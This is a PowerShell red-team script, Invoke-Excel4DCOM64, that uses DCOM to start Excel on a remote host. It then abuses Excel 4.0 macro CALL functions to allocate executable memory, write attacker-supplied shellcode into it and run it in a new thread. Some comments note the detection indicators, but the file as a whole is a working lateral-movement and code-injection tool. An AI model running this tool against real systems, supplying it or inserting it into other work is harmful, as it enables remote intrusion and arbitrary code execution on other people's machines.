#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************
function Invoke-Excel4DCOM
{
<#
.SYNOPSIS
Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM.
.DESCRIPTION
Use Excel 4.0 / XLM macros on a DCOM instance of excel.exe to do shellcode injection. Take care to run with the x64 switch for x64 Office,
and to use a Powershell version with the same bitness as the Office version when running locally.

Observable chain on the target host: a DCOM activation of the Excel.Application ProgID, then
excel.exe itself calling VirtualAlloc (RWX), memset once per byte, and CreateThread. No workbook
or document is opened, and the COM object is never released or quit, so an excel.exe process
remains after the function returns.
.PARAMETER ComputerName
Specify a remote host to inject into.
.PARAMETER Payload
Specify a file containing the raw shellcode bytes (x86 by default, x64 when -x64 is given).
.PARAMETER x64
Use with 64-bit Office. Its only effect in this function is the preferred allocation address passed to VirtualAlloc.
.EXAMPLE
PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin
Inject x86 payload from payload.bin into excel.exe on server01.
PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\x64payload.bin -x64
Inject x64 payload from x64payload.bin into excel.exe on server01.
.LINK
http://www.outflank.nl
.NOTES
Outflank - stan@outflank.nl
#>
[CmdletBinding()] Param(
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)]
[Alias("PSComputerName","MachineName","IP","IPAddress","Host")]
[String]
$ComputerName,
[Parameter(Position = 1, Mandatory = $true)]
[Alias("Shellcode")]
[String]
$Payload,
[switch]$x64
)
# Create an instance of the Excel.Application COM object
# DCOM activation on $ComputerName (local or remote); this is what starts excel.exe there.
# No document is ever opened through this object.
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
if ($x64) {
# If we are using 64bit Excel, try to allocate a low address
# 1342177280 = 0x50000000. -x64 changes nothing else in this function.
$lpAddress = 1342177280
}
else {
# 0 lets VirtualAlloc pick the address.
$lpAddress = 0
}
# Read the payload file as raw bytes.
# NOTE: -Encoding Byte exists only in Windows PowerShell 5.x; PowerShell 6+ replaced it with -AsByteStream.
$sc = get-content -Encoding Byte $Payload
# Address allocation
# VirtualAlloc(lpAddress, $sc.length, 12288, 64) executed inside excel.exe.
# 12288 = 0x3000 = MEM_COMMIT | MEM_RESERVE; 64 = 0x40 = PAGE_EXECUTE_READWRITE.
# An RWX private allocation by excel.exe is the first host-level indicator of this technique.
$memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",'+$lpAddress+',' + $sc.length + ',12288,64)')
$count = 0
# Write the payload byte by byte to oure allocated buffer
# Each iteration is a separate ExecuteExcel4Macro call, i.e. one DCOM round-trip per byte
# (memset of length 1 at $memaddr + $count). $ret is not used.
foreach ($byte in $sc) {
$ret = $excel.ExecuteExcel4Macro('CALL("ntdll","memset","JJJJ", ' + ($memaddr + $count) + ',' + $byte + ', 1)')
$count = $count + 1
Write-Progress -Id 1 -Activity "Invoke-Excel4DCOM64" -CurrentOperation "Injecting shellcode" -PercentComplete ($count / $sc.length * 100)
}
# Shellcode Time!
# CreateThread with $memaddr as the start address: a new thread in excel.exe whose start
# address lies in an unbacked RWX region. Return value is not checked; $excel is neither
# released nor quit, so excel.exe stays running on the target.
$excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)')
}